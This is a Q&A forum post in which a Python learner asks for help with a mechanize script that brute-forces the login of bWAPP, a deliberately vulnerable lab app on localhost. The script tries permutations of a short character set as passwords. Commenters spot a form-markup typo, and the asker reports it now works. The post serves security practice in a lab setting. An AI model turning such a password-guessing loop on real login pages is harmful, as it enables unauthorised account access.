# brute force simple authentication

Tags: python-2.7

Hi to all I am new to python intermediate level and I am trying to develop simple authentication brute force tool, I am really unaware where I missed please someone correct my mistake I am trying this code in mutillidea and bwapp. code is listed below

## !/usr/bin/python

```
import mechanize 
import itertools

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

combos = itertools.permutations("pwa",3) 
r = br.open("http://127.0.0.1/bwapp/login.php")
for x in combos:    
    new_form = '''  
    <<form action="/bwapp/login.php" method="POST">

        <p><label for="login">Login:</label><br />
        <input type="text" id="login" name="login" size="20" autocomplete="off"></p> 

        <p><label for="password">Password:</label><br />
        <input type="password" id="password" name="password" size="20" autocomplete="off"></p>

        <p><label for="security_level">Set the security level:</label><br />

        <select name="security_level">

            <option value="0">low</option>
            <option value="1">medium</option>
            <option value="2">high</option>

        </select>

        </p>

        <button type="submit" name="form"            value="submit">Login</button>

    </form>
'''
        
    r.set_data(new_form)
    br.set_response(r)
    br.select_form( nr = 0 )
    br.form['login'] = 'bee'
    br.form['password'] = ''.join(x)
    br.form['security_level'] = 0
    print "Checking ",br.form['password']
    response=br.submit()
    if response.geturl()=="http://127.0.0.1/bwapp/portal.php":
    #url to which the page is redirected after login
        print "Correct password is ",''.join(x)
        break
```

Error I am getting is I cannot get correct password

Comment: your form tag contain ' <<form action="' may be you should  change it to '<form>'

Comment: it is the Source code of the Bwapp (vulnerable web page) any other solution...

Comment: Thnx I have made it work already :)